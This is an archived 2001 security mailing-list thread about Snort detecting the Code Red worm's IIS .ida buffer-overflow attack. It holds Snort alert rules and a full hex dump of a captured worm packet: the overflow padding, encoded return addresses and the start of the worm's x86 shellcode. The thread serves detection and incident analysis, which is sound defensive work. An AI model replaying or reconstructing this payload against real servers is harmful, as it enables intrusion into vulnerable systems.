Re: .ida Intrusion Attempt

From: Dr SuSE (drsuseat_private)
Date: Thu Jul 19 2001 - 10:24:36 PDT

  • Next message: Colby Rice: "The Code Red list GROWS!"

    I'm running 1.8p1 and the .ida rule picked up all visits from the code red worm 
    which we started seeing this afternoon without issue.  Below is the complete 
    packet if your interested.
    
    length = 1460
    
    000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
    010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
    020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
    0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
    100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
    110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
    120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
    130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
    140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
    150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
    160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
    170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
    180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
    190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
    1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
    1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
    1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
    1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
    1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
    1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
    200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
    210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
    220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
    230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
    240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
    250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
    260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
    270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
    280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
    290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
    2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q<..X...3.f.
    2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
    2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B<..X....T.
    2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
    2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
    2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
    300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
    310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
    320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
    330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
    340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
    350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
    360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
    370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
    380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....<.GetP....
    390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
    3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
    3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
    3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
    3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
    3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
    3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
    400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
    410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
    420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
    430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
    440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
    450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
    460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
    470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
    480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
    490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
    4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
    4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
    4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
    4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
    4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
    4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
    500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
    510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
    520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
    530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
    540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
    550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
    560 : 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE FF FF   ..Q...P.....P...
    570 : 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 8B 8D   .u&..j...L...P..
    580 : 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 6C FE   h...Q.U..B.P..l.
    590 : FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF FF 64   ..;..CKCK..P...d
    5a0 : 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 FE FF   }\..P........P..
    5b0 : FF 8B 95 50                                       ...P
    
    > That's a rule ordering issue, I'm pretty sure we fixed that one in
    > 1.8-RELEASE...
    > 
    >     -Marty
    > 
    > Joe Smith wrote:
    > > 
    > > Hey all,
    > > 
    > > Just got this .ida attack on my sensors.  This is
    > > cute, how it splits the GET from the default.ida?
    > > query.
    > > 
    > > Please note that while snort did detect it, it wasn't
    > > detected by the .ida rule.  Instead, it detected
    > > it as a whisker splice attack.
    > > 
    > > alert TCP $EXTERNAL any -> $INTERNAL 80 (msg:
    > > "IDS415/web-misc_http-whisker-splicing-attack-tab";
    > > dsize: <5; flags: A+; content: "|09|"; classtype:
    > > suspicious; reference: arachnids,415;)
    > > 
    > > alert TCP $EXTERNAL any -> $INTERNAL 80 (msg:
    > > "IDS552/web-iis_IIS ISAPI Overflow ida"; dsize: >239;
    > > flags: A+; uricontent: ".ida?"; classtype:
    > > system-or-info-attempt; reference: arachnids,552;)
    > > 
    > > I'm guessing that once snort found a match with
    > > whisker, it stopped looking for other matches.
    > > 
    > > I've included the relavent frames for your review.
    > > 
    > > 63.241.137.194-attacker        my.poor.website
    > >   HTTP     GET
    > > Frame 4 (60 on wire, 60 captured)
    > > Ethernet II
    > > Internet Protocol
    > > Transmission Control Protocol, Src Port: 21500
    > > (21500), Dst Port: 80 (80), Seq: 3988343872, Ack:
    > > 2181442487
    > > Hypertext Transfer Protocol
    > > 
    > >    0  00d0 b790 dd6f 0002 1724 4800 0800 4500
    > > .....o...$H...E.
    > >   10  002c 105a 4000 7206 9c64 3ff1 89c2 3f59
    > > .,.Z@.r..d?...?Y
    > >   20  5301 53fc 0050 edb9 4c40 8206 2bb7 5018
    > > S.S..P..L@..+.P.
    > >   30  40b0 3ba1 0000 4745 5420 0000
    > > @.;...GET ..
    > > 
    > > 63.241.137.194-attacker        my.poor.website
    > >    HTTP     Continuation
    > > Frame 5 (1434 on wire, 100 captured)
    > > Ethernet II
    > > Internet Protocol
    > > Transmission Control Protocol, Src Port: 21500
    > > (21500), Dst Port: 80 (80), Seq: 3988343876, Ack:
    > > 2181442487
    > > Hypertext Transfer Protocol
    > > 
    > >    0  00d0 b790 dd6f 0002 1724 4800 0800 4500
    > > .....o...$H...E.
    > >   10  058c 105b 4000 7206 9703 3ff1 89c2 3f59
    > > ...[@.r...?...?Y
    > >   20  5301 53fc 0050 edb9 4c44 8206 2bb7 5018
    > > S.S..P..LD..+.P.
    > >   30  40b0 0109 0000 2f64 6566 6175 6c74 2e69
    > > @...../default.i
    > >   40  6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e
    > > da?NNNNNNNNNNNNN
    > >   50  4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e
    > > NNNNNNNNNNNNNNNN
    > >   60  4e4e 4e4e                                 NNNN
    > > 
    > > 
    > > __________________________________________________
    > > Do You Yahoo!?
    > > Get personalized email addresses from Yahoo! Mail
    > > http://personal.mail.yahoo.com/
    > 
    > --
    > Martin Roesch
    > roeschat_private
    > http://www.sourcefire.com - http://www.snort.org
    > 
    
    
    Score my PGP key @
    http://www.drsuse.org/pks
    
    ---------------------------------------------
    Microsoft ist nicht installiert.
    http://www.drsuse.org/
    
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Jul 19 2001 - 16:22:41 PDT